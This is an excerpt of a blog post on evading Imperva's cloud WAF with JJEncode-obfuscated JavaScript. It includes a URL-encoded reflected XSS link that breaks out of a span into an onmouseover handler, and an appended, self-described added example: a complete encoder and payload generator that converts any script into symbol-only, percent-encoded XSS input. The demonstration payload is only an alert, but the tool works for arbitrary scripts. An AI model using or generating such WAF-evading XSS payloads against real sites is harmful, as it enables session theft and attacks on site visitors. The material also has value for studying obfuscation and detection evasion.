Imperva Cloud WAF Bypass
    https://techanarchy.net/blog/imperva-waf-bypass

    Fortunately, for me at least, I had seen this technique before. JJEncode and JSFuck were techniques I had seen used by exploit kits to obfuscate JavaScript payloads and redirect chains to hinder analysis and try to evade detection engines.

    JJEncode and JSFuck take the JavaScript you want to execute and from it create valid JavaScript code that uses no alphabetic or numeric characters; instead it uses a set of symbols.


    Taking a look at the example below, we take a simple JavaScript line:

    Code:
    alert("Hello, JavaScript" )

    Code:
    $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+",\\"+$.$__+$.___+"\\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\"\\"+$.$__+$.___+")"+"\"")())();
    How this is valid JavaScript I assume is black magic, but it works.

    I throw this into the onmouseover HTML tag and . . .
    I hit the WAF again.

    One more try: this time I took the JJEncoded output and ran a simple URL encode on it. This gave me a really ugly URL.

    Code:
    https://shenanigans/search?search=%3E%3C/span%3E%3Cp%20onmouseover=%27p%3D%7E%5B%5D%3Bp%3D%7B%5F%5F%5F%3A%2B%2Bp%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%5F%24%3A%2B%2Bp%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%24%5F%3A%2B%2Bp%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%24%3A%28p%5Bp%5D%2B%22%22%29%5Bp%5D%2C%5F%24%24%3A%2B%2Bp%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5Bp%5D%2C%24%5F%5F%3A%2B%2Bp%2C%24%5F%24%3A%2B%2Bp%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%3A%2B%2Bp%2C%24%24%24%3A%2B%2Bp%2C%24%5F%5F%5F%3A%2B%2Bp%2C%24%5F%5F%24%3A%2B%2Bp%7D%3Bp%2E%24%5F%3D%28p%2E%24%5F%3Dp%2B%22%22%29%5Bp%2E%24%5F%24%5D%2B%28p%2E%5F%24%3Dp%2E%24%5F%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%24%24%3D%28p%2E%24%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28%28%21p%29%2B%22%22%29%5Bp%2E%5F%24%24%5D%2B%28p%2E%5F%5F%3Dp%2E%24%5F%5Bp%2E%24%24%5F%5D%29%2B%28p%2E%24%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%5F%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%5F%5D%29%2Bp%2E%24%5F%5Bp%2E%24%5F%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%24%2Bp%2E%24%3Bp%2E%24%24%3Dp%2E%24%2B%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%2Bp%2E%24%2Bp%2E%24%24%3Bp%2E%24%3D%28p%2E%5F%5F%5F%29%5Bp%2E%24%5F%5D%5Bp%2E%24%5F%5D%3Bp%2E%24%28p%2E%24%28p%2E%24%24%2B%22%5C%22%22%2Bp%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%24%24%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2Bp%2E%5F%5F%2B%22%28%5C%5C%5C%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%5F%2Bp%2E%24%24%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%5F%24%2B%22%2C%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%24%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%5F%24%24%2Bp%2E%24%24%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%5F%24%2Bp%2E%5F%5F%24%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%5F%5F%2Bp%2E%5F%5F%2B%22%5C%5C%5C%22%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B%27%3E
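A worked example added here, not part of the original post or of the techanarchy.net write-up, and not JJEncode's own code: a simplified JJEncode-style encoder in JavaScript that rebuilds the construction in the post's payload. It shows how the header derives the digits 0-9 from `++$`, letters from indexing into `(![]+"")`, `(!""+"")`, `({}+"")` and an undefined property coerced to `"undefined"`, how `"constructor"` and `"return"` give it `Function`, how any character without a property becomes a legacy octal escape, and how the result is then percent-encoded for the URL. The function names `jjencode`, `runEncoded`, `urlEncodeAll` and `onmouseoverPayload` are this example's own; the `></span><p onmouseover='...'>` wrapper and the `p` variable name are taken from the post's URL. It handles printable ASCII input only.

```javascript
// Added example (not code from the original post or from techanarchy.net):
// a minimal JJEncode-style encoder showing where the symbol-only JavaScript
// in the post comes from, plus the "encode everything" URL step. It is a
// simplified reimplementation, not the JJEncode project's own code, and it
// only covers printable ASCII input.

// The JJEncode header. "@=~[]" is -1, every "++@" yields the next digit
// 0..9, and letters are sliced by index out of coerced strings such as
// "false", "true", "undefined" and "[object Object]". "@" is replaced by
// the chosen global variable name ($ in the post's first payload, p in the URL).
const HEADER = [
  '@=~[];@={___:++@,$$$$:(![]+"")[@],__$:++@,$_$_:(![]+"")[@],_$_:++@,',
  '$_$$:({}+"")[@],$$_$:(@[@]+"")[@],_$$:++@,$$$_:(!""+"")[@],$__:++@,',
  '$_$:++@,$$__:({}+"")[@],$$_:++@,$$$:++@,$___:++@,$__$:++@};',
  // @.$_ becomes "constructor", @.$$ becomes "return", @.$ becomes Function
  '@.$_=(@.$_=@+"")[@.$_$]+(@._$=@.$_[@.__$])+(@.$$=(@.$+"")[@.__$])+',
  '((!@)+"")[@._$$]+(@.__=@.$_[@.$$_])+(@.$=(!""+"")[@.__$])+',
  '(@._=(!""+"")[@._$_])+@.$_[@.$_$]+@.__+@._$+@.$;',
  '@.$$=@.$+(!""+"")[@._$$]+@.__+@._+@.$+@.$$;',
  '@.$=(@.___)[@.$_][@.$_];',
].join('');

// Digits 0-9 and the letters the header makes directly available.
const DIGITS = ['___', '__$', '_$_', '_$$', '$__', '$_$', '$$_', '$$$', '$___', '$__$'];
const LETTERS = { a: '$_$_', b: '$_$$', c: '$$__', d: '$$_$', e: '$$$_', f: '$$$$', o: '_$', t: '__', u: '_' };

// Turn `source` into JavaScript without letters or digits (when gv is "$").
// Level 0 is the generated source; level 1 is the string it builds at run
// time, which becomes the body of Function(): return"<source as a literal>".
function jjencode(source, gv = '$') {
  const prop = (name) => gv + '.' + name;
  // Emit a run of level-1 text as a level-0 string literal (escape once more).
  const lit = (s) => '"' + s.replace(/\\/g, '\\\\').replace(/"/g, '\\"') + '"';
  let expr = '';
  let run = '';
  const flush = () => { if (run) { expr += '+' + lit(run); run = ''; } };
  for (const ch of source) {
    const code = ch.charCodeAt(0);
    if (LETTERS[ch]) { flush(); expr += '+' + prop(LETTERS[ch]); }
    else if (ch === 'l') { flush(); expr += '+(![]+"")[' + prop('_$_') + ']'; }
    else if (code >= 0x30 && code <= 0x39) { flush(); expr += '+' + prop(DIGITS[code - 0x30]); }
    else if (ch === '"') run += '\\"';
    else if (ch === '\\') run += '\\\\';
    else if (code > 0x20 && code < 0x7f && !/[A-Za-z0-9]/.test(ch)) run += ch; // punctuation stays literal
    else if (code < 0x80) {
      // Anything else (other letters, space, controls) becomes a legacy octal
      // escape: a literal backslash followed by digit properties, e.g. "r" = \162.
      run += '\\';
      flush();
      expr += code.toString(8).split('').map((d) => '+' + prop(DIGITS[+d])).join('');
    } else throw new Error('non-ASCII input is not handled in this example');
  }
  flush();
  const body = prop('$$') + '+' + lit('"') + expr + '+' + lit('"');
  // Function(Function('return"..."')())(): decode, then execute.
  return HEADER.replace(/@/g, () => gv) + prop('$') + '(' + prop('$') + '(' + body + ')())();';
}

// Run encoded output under Node with a stand-in for the browser's alert(),
// returning the alert() arguments it produced.
function runEncoded(code) {
  const calls = [];
  const saved = globalThis.alert;
  globalThis.alert = (m) => { calls.push(String(m)); };
  try { new Function(code)(); } finally { globalThis.alert = saved; }
  return calls;
}

// The "simple URL encode" of the post: every byte that is not a letter or
// digit is percent-encoded (encodeURIComponent() would leave ( ) ! _ . ~ alone).
// ASCII input only, which is all jjencode() produces.
function urlEncodeAll(s) {
  return Array.from(s, (ch) => (/[A-Za-z0-9]/.test(ch)
    ? ch
    : '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'))).join('');
}

// The reflected parameter value shaped like the post's URL: close the current
// element, open a <p> whose onmouseover attribute carries the encoded script,
// with the global renamed to p as in the post. A single quote in the encoded
// script would end the attribute early, so refuse such input.
function onmouseoverPayload(source, gv = 'p') {
  const js = jjencode(source, gv);
  if (js.includes("'")) throw new Error('payload would break out of the single-quoted attribute');
  return urlEncodeAll("></span><p onmouseover='" + js + "'>");
}

// Example run on the post's own input.
const encoded = jjencode('alert("Hello, JavaScript" )');
console.log(encoded);
console.log(runEncoded(encoded)); // [ 'Hello, JavaScript' ]
console.log(onmouseoverPayload('alert(1)'));
```

For the post's input the encoder emits the same symbol-only line the post shows, and running it under Node with the stub `alert()` yields the message. The property the technique relies on is checkable directly: the `$`-variant output contains no letter or digit at all, so nothing in the value resembles a JavaScript keyword or function name. The octal branch is where characters outside the small property table end up (`H`, `J`, `v`, `S`, `i`, `p`, `r` and the space in the post's payload), and digits are always emitted as properties rather than literals so that an escape such as `\40` is never followed by a literal digit that would change its value.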